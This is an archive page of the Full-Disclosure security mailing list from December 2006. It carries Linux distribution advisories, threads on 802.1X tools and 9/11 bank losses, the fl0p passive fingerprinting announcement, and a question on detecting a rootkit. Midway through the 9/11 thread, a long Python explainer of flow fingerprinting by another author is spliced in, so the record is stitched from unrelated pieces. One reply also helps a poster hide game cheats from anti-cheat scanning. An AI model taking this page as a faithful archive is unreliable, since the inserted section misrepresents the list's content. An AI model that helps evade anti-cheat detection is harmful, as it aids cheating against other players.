 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID    Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFcHEwmqjQ0CJFipgRAmRsAJ9maSoEYLobFpNgiMarEgFpcFVQwgCdETbx
BpC/9xb5tzUEDiL6MwB8IXQ=
=Popd
-----END PGP SIGNATURE-----

From security at mandriva.com Sat Dec 2 00:17:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 1 Dec 2006 17:17:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:223 ] - Updated ImageMagick packages fixes vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:223
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : ImageMagick
 Date    : December 1, 2006
 Affected: 2006.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

 Multiple buffer overflows in ImageMagick 6.0 before 6.0.6.2, and 6.2 before 6.2.4.5, have unknown impact and user-assisted attack vectors via a crafted SGI image.

 Updated packages have been patched to correct this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5868
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2006.0:
 df62dd8449b08426a4188d5959b3f823  2006.0/i586/ImageMagick-6.2.4.3-1.4.20060mdk.i586.rpm
 e87bbddff33171aae89d1d08400907a7  2006.0/i586/ImageMagick-doc-6.2.4.3-1.4.20060mdk.i586.rpm
 8755d8beabe9a85f3e7a07b73d071c59  2006.0/i586/libMagick8.4.2-6.2.4.3-1.4.20060mdk.i586.rpm
 2b6ae5e3b4c8e187e095442e7dcd5c24  2006.0/i586/libMagick8.4.2-devel-6.2.4.3-1.4.20060mdk.i586.rpm
 d7e61aa5943b52eb374b0a2e44232e93  2006.0/i586/perl-Image-Magick-6.2.4.3-1.4.20060mdk.i586.rpm
 e5875ef8dd63237d5c7c74a441b123fc  2006.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 973d1bb7026248e93c9f1a16eba0cfaf  2006.0/x86_64/ImageMagick-6.2.4.3-1.4.20060mdk.x86_64.rpm
 ca759633ecf8ef52b1c34f55d5a3af6d  2006.0/x86_64/ImageMagick-doc-6.2.4.3-1.4.20060mdk.x86_64.rpm
 f65de07d50364a3c861f50ce6f11fee4  2006.0/x86_64/lib64Magick8.4.2-6.2.4.3-1.4.20060mdk.x86_64.rpm
 c9e86c379bdfeb36e25bfd34e094b921  2006.0/x86_64/lib64Magick8.4.2-devel-6.2.4.3-1.4.20060mdk.x86_64.rpm
 9d58fe1606d8f1f0f6a225df3ac58b48  2006.0/x86_64/perl-Image-Magick-6.2.4.3-1.4.20060mdk.x86_64.rpm
 e5875ef8dd63237d5c7c74a441b123fc  2006.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mdk.src.rpm

 Corporate 3.0:
 fc15d48d236f0d1f738c795190081ddd  corporate/3.0/i586/ImageMagick-5.5.7.15-6.9.C30mdk.i586.rpm
 3ba801afddeb42759aebd891971b5fce  corporate/3.0/i586/ImageMagick-doc-5.5.7.15-6.9.C30mdk.i586.rpm
 35c8a337172b91501486381be4e0aa7d  corporate/3.0/i586/libMagick5.5.7-5.5.7.15-6.9.C30mdk.i586.rpm
 3273f233005c79adf0602ade443de675  corporate/3.0/i586/libMagick5.5.7-devel-5.5.7.15-6.9.C30mdk.i586.rpm
 8dfce9d9e00005e990c1203c1144ac34  corporate/3.0/i586/perl-Magick-5.5.7.15-6.9.C30mdk.i586.rpm
 3cf9bff07102ada97373a66c5f4c6e05  corporate/3.0/SRPMS/ImageMagick-5.5.7.15-6.9.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 0f8193fed5ac7b344398b9e99fe5bccb  corporate/3.0/x86_64/ImageMagick-5.5.7.15-6.9.C30mdk.x86_64.rpm
 bdae28be1bcacf4f5bc6d9bdfa589cbd  corporate/3.0/x86_64/ImageMagick-doc-5.5.7.15-6.9.C30mdk.x86_64.rpm
 fa4a5fe3e447770c33ef0596da8570fb  corporate/3.0/x86_64/lib64Magick5.5.7-5.5.7.15-6.9.C30mdk.x86_64.rpm
 8af081adcd750d5edec44bf1e85e5c7d  corporate/3.0/x86_64/lib64Magick5.5.7-devel-5.5.7.15-6.9.C30mdk.x86_64.rpm
 e238642447217ade5a772c4b12b492b3  corporate/3.0/x86_64/perl-Magick-5.5.7.15-6.9.C30mdk.x86_64.rpm
 3cf9bff07102ada97373a66c5f4c6e05  corporate/3.0/SRPMS/ImageMagick-5.5.7.15-6.9.C30mdk.src.rpm

 Corporate 4.0:
 dde2f028a95732f3d5fd5bfd48ede727  corporate/4.0/i586/ImageMagick-6.2.4.3-1.4.20060mlcs4.i586.rpm
 6affed772cabdc8e8eb6e6ed96efb178  corporate/4.0/i586/ImageMagick-doc-6.2.4.3-1.4.20060mlcs4.i586.rpm
 426d44c76834a660ea48c09719048de2  corporate/4.0/i586/libMagick8.4.2-6.2.4.3-1.4.20060mlcs4.i586.rpm
 4cc0f80f0bbfdbc1c26a497f14e2dd0d  corporate/4.0/i586/libMagick8.4.2-devel-6.2.4.3-1.4.20060mlcs4.i586.rpm
 9deab133788e00cf6487a057042c3ae0  corporate/4.0/i586/perl-Image-Magick-6.2.4.3-1.4.20060mlcs4.i586.rpm
 0b75266159c73fcb8a0f7027d208bee2  corporate/4.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 283a0751148b3468bd3e2281d819f08d  corporate/4.0/x86_64/ImageMagick-6.2.4.3-1.4.20060mlcs4.x86_64.rpm
 48ee2e7835b97a89e27342c3a27db913  corporate/4.0/x86_64/ImageMagick-doc-6.2.4.3-1.4.20060mlcs4.x86_64.rpm
 fad038ed56f886f4656302721a616578  corporate/4.0/x86_64/lib64Magick8.4.2-6.2.4.3-1.4.20060mlcs4.x86_64.rpm
 17b7841d6459f0a52662f43d16f09771  corporate/4.0/x86_64/lib64Magick8.4.2-devel-6.2.4.3-1.4.20060mlcs4.x86_64.rpm
 dbcfd793204ead891cbf779c1075287e  corporate/4.0/x86_64/perl-Image-Magick-6.2.4.3-1.4.20060mlcs4.x86_64.rpm
 0b75266159c73fcb8a0f7027d208bee2  corporate/4.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mlcs4.src.rpm
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.
 The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.

 You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID    Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFcJi1mqjQ0CJFipgRAoCvAJ9sJwsy6KmxvLwFtEyFiCoLvVHIaACgj+2v
kI0mULDMWX7ydgtZ+bArC40=
=m55O
-----END PGP SIGNATURE-----

From douglashaider at hotmail.com Sat Dec 2 05:55:49 2006
From: douglashaider at hotmail.com (Douglas Haider)
Date: Fri, 01 Dec 2006 22:55:49 -0700
Subject: [Full-disclosure] 802.1X tool?
In-Reply-To: <45708D89.2030407@csuohio.edu>
Message-ID:

The Funk Odyssey tool is now owned by Juniper. That being said, I have used the Odyssey tool and I am impressed with its functionality, especially from a risk management / controls perspective.

Respectfully,
Douglas

>From: Michael Holstein
>To: Full-Disclosure ,Wifisec
>
>Subject: Re: [Full-disclosure] 802.1X tool?
>Date: Fri, 01 Dec 2006 15:16:09 -0500
>
>Meetinghouse (AEGIS) or Funk (Odyssey).
>
>Note : Meetinghouse is now owned by Cisco.
>
>Cheers,
>
>~Mike.
>
>
>Ozan Ozkara wrote:
>>Hi folks,
>>
>>I am trying to find a tool which provides automatic client configuration
>>for 802.1X implementation in a Windows environment. I'm trying to
>>implement 802.1X authentication for both wired and wireless connections.
>>Is there any way to do a remote client configuration tool for the win32
>>environment? Will I be able to do that?
>>
>>I'd appreciate any real world experience on the subject.
>>
>>thanks
>>
>>------------------------------------------------------------------------
>>

From guillaume.barberot at gmail.com Sat Dec 2 16:57:37 2006
From: guillaume.barberot at gmail.com (Guillaume Barberot)
Date: Sat, 2 Dec 2006 17:57:37 +0100
Subject: [Full-disclosure] 802.1X tool?
In-Reply-To:
References: <45708D89.2030407@csuohio.edu>
Message-ID:

Moreover, the Juniper/Funk Odyssey client can choose to connect only one network interface if both the LAN and WLAN interfaces are connected, by disconnecting the other one.

GB.

2006/12/2, Douglas Haider :
> The Funk Odyssey tool is now owned by Juniper. That being said, I have used
> the Odyssey tool and I am impressed with its functionality, especially from a
> risk management / controls perspective.
>
> Respectfully,
> Douglas
>

From kefka at kevinbeardsucks.com Sun Dec 3 01:58:07 2006
From: kefka at kevinbeardsucks.com (kefka)
Date: Sat, 02 Dec 2006 20:58:07 -0500
Subject: [Full-disclosure] how to hide files, services and process in windows 2k/xp/2k3 box
In-Reply-To: <456F6FC5.5090802@markbaker.net>
References: 003401c58548$1272f370$6f64a8c0@microsof28e7c5 <456F6FC5.5090802@markbaker.net>
Message-ID: <45722F2F.9000803@kevinbeardsucks.com>

Process Guard and other similar applications can do this for you. You're trying to keep some anti-cheat engine from scanning your cheats, correct?
---------------------

Mark Baker wrote:
>I am trying to find a rootkit to hide processes and DLLs from World of
>Warcraft but can't find where to download AFX rootkit. Can you direct
>me where to download the rootkit and instructions?
>
>Thanks!
>

From lcamtuf at dione.ids.pl Sun Dec 3 05:41:08 2006
From: lcamtuf at dione.ids.pl (Michal Zalewski)
Date: Sun, 3 Dec 2006 06:41:08 +0100 (CET)
Subject: [Full-disclosure] fl0p - passive L7 flow fingerprinting
Message-ID:

I'd like to announce the availability of a tool called fl0p, which I hope might be of some interest to various network security dudes and dudettes on the list (and will hopefully serve as a convenient framework for cool research).

The tool is a simple flow-analyzing passive L7 fingerprinter. It examines the sequence of client-server exchanges, their relative layer 7 payload sizes, and transmission intervals (as opposed to inspecting the contents, which is what most passive fingerprinters and "smart" sniffers would do to analyze transmissions). This is then matched against a database of traffic pattern signatures to infer some interesting facts about the traffic.

This is along the lines of research done by Solar Designer and Dug Song on timing SSH sessions (though I do not focus on protocol design flaws); this type of analysis got very little air time to date, but unjustly so - there are several interesting benefits of even such a superficial flow analysis:

  - General insight into legitimate encrypted sessions can be gained: for example, it is trivial to remotely and automatically spot SSH login failures, and react accordingly: the timing and sequence of packets, depending on the version of SSH, negotiated protocols, and authentication outcome, will differ quite drastically.
  - Human actions can be easily told apart from automated efforts based on the latency inherent to the wetware I/O bus. As such, you can spot manual poking at your SMTP service despite the noise generated by Internet worms and spam zombies; or, you can tell even a subtle automated SSH login attempt from a typo done by a human being. This extends to most other text-based services. Even such subtle features as user security settings and displayed prompts can be determined: the first-time cryptographic key trust question leaves its trace in session timings.

  - Rogue cryptography can be examined: general flow behavior remains relatively constant regardless of the technology used to hide the actual transferred data. As such, backdoors or firewall evasion techniques that use HTTPS on 443/tcp should be easy to diagnose, either by directly matching relaxed signatures for the tunneled traffic itself, or by spotting unusual client-server traffic / timing imbalances.

Now, of course, all this could be achieved before in a slow and painful way - but with fl0p, you have a (primitive but working) tool to simply say:

  tcp * = < s27/15 c27/15 s300/100 > : SSH1 - client chose to refuse server key
  tcp * = s12 c@1 s28 + c52 s@1 c@1 s@3 : SSH1 - invalid password attempt
  tcp * = s12 c@1 s28 c52 s@1 c@1 s@3 : SSH1 - automated password guessing
  tcp * = c30/30 + c1 c1 c1 : Possible manual Windows telnet input (2)

...then launch the program and go to the movies.
An example of fl0p output is as follows:

  (tcp) 213.195.140.12:4667 -> 213.134.128.25:25
    Observed for: 188B, 6 packets, spans 17 seconds
    Matches: Possible manual line-by-line interaction (hit: 1)

  (tcp) 83.31.193.40:3403 -> 213.134.128.25:22
    Observed for: 584B, 9 packets, spans 5 seconds
    Matches: SSH1 - client manually accepted key (hit: 1)

  (tcp) 83.31.193.40:3406 -> 213.134.128.25:22
    Observed for: 820B, 18 packets, spans 9 seconds
    Matches: SSH1 - invalid password attempt (hit: 2)

  (tcp) 83.31.193.40:3436 -> 213.134.128.25:22
    Observed for: 2.9kB, 19 packets, spans 2 seconds
    Matches: SSH2 - correct password (hit: 2)

The tool is available at:

  http://lcamtuf.coredump.cx/fl0p-devel.tgz

...and is of course LGPLed ("free as in communism"). It is fully functional, albeit still marked as "beta" because of a small signature database (that I'm hoping to extend as a result of this announcement) and (naturally) some spartan documentation. Because of this, at this point, consider it more of a PoC / framework than a standalone fire-and-forget server tool.

Your feedback, help, and above all, signature submissions, are as always greatly appreciated.

Regards,
/mz

From matthew.flaschen at gatech.edu Sun Dec 3 06:25:13 2006
From: matthew.flaschen at gatech.edu (Matthew Flaschen)
Date: Sun, 03 Dec 2006 01:25:13 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com>
References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com>
Message-ID: <45726DC9.5060200@gatech.edu>

Or, realize that no one lost money in 9/11, even those who had banks in the World Trade Center. Why? Every bank has multiple redundant backups, including offsite storage.

Matthew Flaschen

TheGesus wrote:
> Conclusion: Withdraw and stockpile some cash now. Shoot for at least
> three months' cash requirements. Don't wait. Start now.
>
> ==================

From dudevanwinkle at gmail.com Sun Dec 3 09:02:06 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Sun, 3 Dec 2006 04:02:06 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <45726DC9.5060200@gatech.edu>
References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu>
Message-ID:

On 12/3/06, Matthew Flaschen wrote:
> Or, realize that no one lost money in 9/11, even those who had banks in
> the World Trade Center. Why? Every bank has multiple redundant
> backups, including offsite storage.
>

hey, you are from gatech...you should know not to use absolutes like "no one lost money in 9/11", especially on a mailing list with: ferg, brian, drsolly, JP, the Randall's, Grandpa, etc, etc; that is run by Gadi!

Represent buddy!

-JP

From michaelslists at gmail.com Sun Dec 3 09:26:15 2006
From: michaelslists at gmail.com (mikeiscool)
Date: Sun, 3 Dec 2006 20:26:15 +1100
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <45726DC9.5060200@gatech.edu>
References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu>
Message-ID: <5e01c29a0612030126r71ebb18ayfc66b65bf04e041c@mail.gmail.com>

I lost money.

On 12/3/06, Matthew Flaschen wrote:
> Or, realize that no one lost money in 9/11, even those who had banks in
> the World Trade Center. Why? Every bank has multiple redundant
> backups, including offsite storage.
>
> Matthew Flaschen
>
> TheGesus wrote:
> > Conclusion: Withdraw and stockpile some cash now. Shoot for at least
> > three months' cash requirements. Don't wait. Start now.
> >
> > ==================
>

From michaelslists at gmail.com Sun Dec 3 09:27:31 2006
From: michaelslists at gmail.com (mikeiscool)
Date: Sun, 3 Dec 2006 20:27:31 +1100
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To:
References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu>
Message-ID: <5e01c29a0612030127o50c20c6fkf3c1e568e14daa8@mail.gmail.com>

On 12/3/06, Dude VanWinkle wrote:
> On 12/3/06, Matthew Flaschen wrote:
> > Or, realize that no one lost money in 9/11, even those who had banks in
> > the World Trade Center. Why? Every bank has multiple redundant
> > backups, including offsite storage.
> >
>
> hey, you are from gatech...you should know not to use absolutes like
> "no one lost money in 9/11", especially on a mailing list with: ferg,
> brian, drsolly, JP, the Randall's, Grandpa, etc, etc; that is run by
> Gadi!

I think you're thinking of another list, we're on fd now ....
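Returning to the fl0p announcement earlier on this page: the flow-signature idea it describes (match the sequence of client/server payload sizes, and use inter-packet timing to tell a human from a script) is shown below as an added illustration written for this page. It is not fl0p's code and does not reproduce fl0p's signature grammar: the '@' and standalone '+' tokens and the '< >' brackets in the announcement are not implemented and no meaning is assumed for them. The mini-grammar here is this example's own (direction letter, byte size with an optional /tolerance, a '+' suffix for repetition, '*' for any size), as are the port filter, the timing thresholds, the labels and the sample flows, all of which are constructed; the SSH1 payload sizes in the first signature are copied from the announcement's example.

```python
"""Passive L7 flow fingerprinting in the spirit of fl0p (added example, not fl0p's code).

Assumed mini-grammar (not fl0p's own; its '@', bare '+' and '< >' are NOT supported):
    s27      server-to-client payload of exactly 27 bytes
    c27/15   client-to-server payload of 27 +/- 15 bytes
    c1+      one or more client payloads of 1 byte each
    c*       client payload of any size

A flow is an ordered list of (direction, payload_bytes, gap_seconds), where
gap_seconds is the time since the previous event in the same flow. Timing is
judged separately by looks_manual(): a person typing produces large, irregular
gaps between client packets; a script does not.
"""
import re
import statistics
from dataclasses import dataclass
from typing import List, Optional, Tuple

Event = Tuple[str, int, float]

_TOKEN_RE = re.compile(r"^([cs])(\*|\d+)(?:/(\d+))?(\+)?$")


@dataclass(frozen=True)
class Token:
    direction: str          # 'c' = client->server, 's' = server->client
    size: Optional[int]     # None = any payload size
    tolerance: int          # accepted +/- deviation in bytes
    repeat: bool            # True = token may absorb one or more events


def parse_signature(line: str):
    """Parse 'tcp <port|*> = <tokens> : <label>' into (port, tokens, label)."""
    head, label = line.split(":", 1)
    proto_port, flow = head.split("=", 1)
    _proto, port = proto_port.split()
    tokens = []
    for raw in flow.split():
        m = _TOKEN_RE.match(raw)
        if not m:
            raise ValueError(f"unsupported token {raw!r}")
        direction, size, tol, rep = m.groups()
        tokens.append(Token(direction, None if size == "*" else int(size),
                            int(tol or 0), rep == "+"))
    return port, tokens, label.strip()


def _fits(tok: Token, event: Event) -> bool:
    direction, size, _gap = event
    if direction != tok.direction:
        return False
    return tok.size is None or abs(size - tok.size) <= tok.tolerance


def _match(tokens: List[Token], events: List[Event], ti: int, ei: int) -> bool:
    """Anchored prefix match of the flow, backtracking over '+' repetitions."""
    if ti == len(tokens):
        return True                       # whole signature consumed
    tok = tokens[ti]
    if ei == len(events) or not _fits(tok, events[ei]):
        return False
    if not tok.repeat:
        return _match(tokens, events, ti + 1, ei + 1)
    end = ei
    while end < len(events) and _fits(tok, events[end]):
        end += 1                          # greedy run of matching events
    for cut in range(end, ei, -1):        # give events back if the rest fails
        if _match(tokens, events, ti + 1, cut):
            return True
    return False


def looks_manual(events: List[Event], min_gap=0.15, min_jitter=0.05) -> bool:
    """Client packets separated by human-scale, irregular gaps suggest typing."""
    gaps = [gap for direction, _size, gap in events[1:] if direction == "c"]
    if len(gaps) < 3:
        return False
    return (statistics.median(gaps) >= min_gap
            and statistics.stdev(gaps) >= min_jitter)


def identify(port: str, events: List[Event], signatures: List[str]) -> List[str]:
    """Return the labels of every signature that matches this flow."""
    hits = []
    for sig in signatures:
        sig_port, tokens, label = parse_signature(sig)
        if sig_port in ("*", port) and _match(tokens, events, 0, 0):
            hits.append(label)
    if looks_manual(events):
        hits.append("Possible manual line-by-line interaction")
    return hits


# Constructed signatures: the SSH1 sizes are the announcement's example,
# the labels, port filter and telnet pattern are this example's own.
SIGNATURES = [
    "tcp 22 = s12 c1 s28 c52 s1 c1 s3 : SSH1 - invalid password attempt",
    "tcp * = c30/30 c1+ : Possible manual Windows telnet input",
]

# Constructed flows: (direction, payload bytes, seconds since previous event).
FLOW_SSH_GUESS = [("s", 12, 0.0), ("c", 1, 0.01), ("s", 28, 0.01),
                  ("c", 52, 0.02), ("s", 1, 0.01), ("c", 1, 0.01), ("s", 3, 0.01)]
FLOW_TELNET_MANUAL = [("c", 25, 0.0), ("c", 1, 0.21), ("c", 1, 0.34),
                      ("c", 1, 0.18), ("c", 1, 0.42), ("s", 2, 0.01)]

if __name__ == "__main__":
    print(identify("22", FLOW_SSH_GUESS, SIGNATURES))
    print(identify("23", FLOW_TELNET_MANUAL, SIGNATURES))
```

Two design points worth noting. The size matcher is anchored at the start of the flow and tolerates trailing events, which is what a passive sensor needs when it classifies a session before it ends. The timing test is kept out of the signature language on purpose: it looks only at the gaps before client packets, so a server that answers slowly does not make a scripted login look human.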
From dudevanwinkle at gmail.com Sun Dec 3 09:39:11 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Sun, 3 Dec 2006 04:39:11 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <5e01c29a0612030127o50c20c6fkf3c1e568e14daa8@mail.gmail.com>
References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu> <5e01c29a0612030127o50c20c6fkf3c1e568e14daa8@mail.gmail.com>
Message-ID:

On 12/3/06, mikeiscool wrote:
> On 12/3/06, Dude VanWinkle wrote:
> > On 12/3/06, Matthew Flaschen wrote:
> > > Or, realize that no one lost money in 9/11, even those who had banks in
> > > the World Trade Center. Why? Every bank has multiple redundant
> > > backups, including offsite storage.
> > >
> >
> > hey, you are from gatech...you should know not to use absolutes like
> > "no one lost money in 9/11", especially on a mailing list with: ferg,
> > brian, drsolly, JP, the Randall's, Grandpa, etc, etc; that is run by
> > Gadi!
>
> I think you're thinking of another list, we're on fd now ....

whoops! gmail combines these conversations when ppl cross post, sorry!

My earlier statement goes quadrillion-fold for FD!

-JP

From ozan at cryptos.net Sun Dec 3 12:06:28 2006
From: ozan at cryptos.net (Ozan Ozkara)
Date: Sun, 03 Dec 2006 14:06:28 +0200
Subject: [Full-disclosure] 802.1X tool?
In-Reply-To: <45708D89.2030407@csuohio.edu>
References: <1165001851.5566.25.camel@prophecy> <45708D89.2030407@csuohio.edu>
Message-ID: <1165147588.9311.1.camel@prophecy>

Thanks to everyone who has responded to my question.

-ozan

On Fri, 2006-12-01 at 15:16 -0500, Michael Holstein wrote:
> Meetinghouse (AEGIS) or Funk (Odyssey).
>
> Note : Meetinghouse is now owned by Cisco.
>
> Cheers,
>
> ~Mike.
>
>
> Ozan Ozkara wrote:
> > Hi folks,
> >
> > I am trying to find a tool which provides automatic client configuration
> > for 802.1X implementation in a Windows environment. I'm trying to
> > implement 802.1X authentication for both wired and wireless connections.
> > Is there any way to do a remote client configuration tool for the win32
> > environment? Will I be able to do that?
> >
> > I'd appreciate any real world experience on the subject.
> >
> > thanks
> >
> > ------------------------------------------------------------------------
> >

From jinsan07 at gmail.com Sun Dec 3 13:23:05 2006
From: jinsan07 at gmail.com (Jin San)
Date: Sun, 3 Dec 2006 22:23:05 +0900
Subject: [Full-disclosure] Detect prrf rootkit
Message-ID:

Hi,

Could anybody tell me which tool can be used to detect the prrf rootkit (Phrack 58)?

Of course the vanilla prrf is easy to detect, as they did not try to hide the kernel module. But suppose that somebody modifies the code, and successfully hides the LKM (I know there are some good ways to do that), how can we detect prrf?

As far as I know, only the EPA (Phrack 59) tool is able to detect prrf. However, EPA does not work very reliably. This rootkit is pretty old, but it seems there is no good method to detect it?
Thanks, Jin From joey at infodrom.org Sun Dec 3 15:30:39 2006 From: joey at infodrom.org (Martin Schulze) Date: Sun, 3 Dec 2006 16:30:39 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1224-1] New Mozilla packages fix several vulnerabilities Message-ID: <20061203153040.06E97FDE1@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1224-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 3rd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : mozilla Vulnerability : several Problem type : remote Debian-specific: no CVE IDs : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748 CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496 BugTraq IDs : 19678 20957 Several security related problems have been discovered in Mozilla and derived products. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-4310 Tomas Kempinsky discovered that malformed FTP server responses could lead to denial of service. CVE-2006-5462 Ulrich K?hn discovered that the correction for a cryptographic flaw in the handling of PKCS-1 certificates was incomplete, which allows the forgery of certificates. CVE-2006-5463 "shutdown" discovered that modification of JavaScript objects during execution could lead to the execution of arbitrary JavaScript bytecode. CVE-2006-5464 Jesse Ruderman and Martijn Wargers discovered several crashes in the layout engine, which might also allow execution of arbitrary code. CVE-2006-5748 Igor Bukanov and Jesse Ruderman discovered several crashes in the JavaScript engine, which might allow execution of arbitrary code. This update also adresses several crashes, which could be triggered by malicious websites and fixes a regression introduced in the previous Mozilla update. 
For the stable distribution (sarge) these problems have been fixed in
version 1.7.8-1sarge8.

We recommend that you upgrade your mozilla package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8.dsc
      Size/MD5 checksum: 1124 a6f4c7ddbcb0d9126d4e0a81fda4059a
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8.diff.gz
      Size/MD5 checksum: 574770 77a056d9582389d1a31de1136dd7a0a2
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8.orig.tar.gz
      Size/MD5 checksum: 30589520 13c0f0331617748426679e8f2e9f537a

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 168064 33104218442c9bd7b113df794afdefe0
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 148564 be8d4aeb7da1d0a7e7524096cefee038
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 184948 f831a7dd089c599c695ab540720be912
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 858396 bd636d8d59d54016d4051ae37fbf0455
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 1034 bb3c11032fe99445e2831485155f9bec
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 11494648 a1029b5935bf687048b0a8156fb3910c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 403290 ade408aef33a53453263a2a83cf96524
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 158332 ccdc52d9b79b5359e18ef4f8e39ae068
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 3358886 c86ce3ccec680c80730cf046560d1cc8
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 122288 91187d98388e73f4ca5aa93314a23d78
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 204152 405074b924c7ec7450da6cc623a2d6f9
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 1937184 a527be2c3bb0991c25b1388b17f36509
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_alpha.deb
      Size/MD5 checksum: 212628 6c21078c7b3676273f1224c7028e4f63

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 168068 44912cded148a15690602d83b05517c4
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 147682 56dd565ea350862e6c512562929d6beb
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 184956 1f2c8bb99907df91c3d0f7800d77461d
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 716604 df8853c93a3f8688efc458929802087a
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 1036 2691304128a390fa0d0ddd06e5c014fd
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 10958880 c7c04de71bd68b738f13c187a88b4ab1
